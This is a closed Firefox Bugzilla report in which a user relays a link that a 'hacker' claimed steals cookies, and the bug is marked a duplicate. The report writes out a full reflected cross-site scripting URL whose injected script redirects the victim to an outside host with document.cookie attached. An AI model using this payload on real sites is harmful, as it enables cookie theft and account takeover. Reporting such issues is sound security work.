Closed Bug 1368465 Opened 8 years ago Closed 8 years ago

Security in URL addresss

Categories

(Firefox :: Untriaged, defect)

Product:
Firefox
Component:
Untriaged
Version:
53 Branch
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1325923

People

(Reporter: hoangvu4000, Unassigned)

Details

User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 Build ID: 20170518000419 Steps to reproduce: A hacker send me an URL, he said with this, he can get user's cookies to login their account http://bit.ly/2rXK4RY He said, If we use Chrome, This problem will not happen. I checked it, It's true. The site, truyentranh8.net, in the link had fix this security problem. you can replace truyentranh8.net with your site... or any un-security site But i thing Firefox need to fix this too... Thank you!!! Actual results: hacker can get user cookis Expected results: http://truyentranh8.net/search.php?act=timnangcao&q=%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%22%3Csvg+%22ons%3E%3CSCRIPT%3Ewindow.location.replace(%22http://smartcare-nct.design/c.php%3Fc%22%2Bdocument.cookie%2Busername);%3C/SCRIPT+%C2%BB%3E
This is a dup of bug 1325923.
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Group: firefox-core-security
You need to log in before you can comment on or make changes to this bug.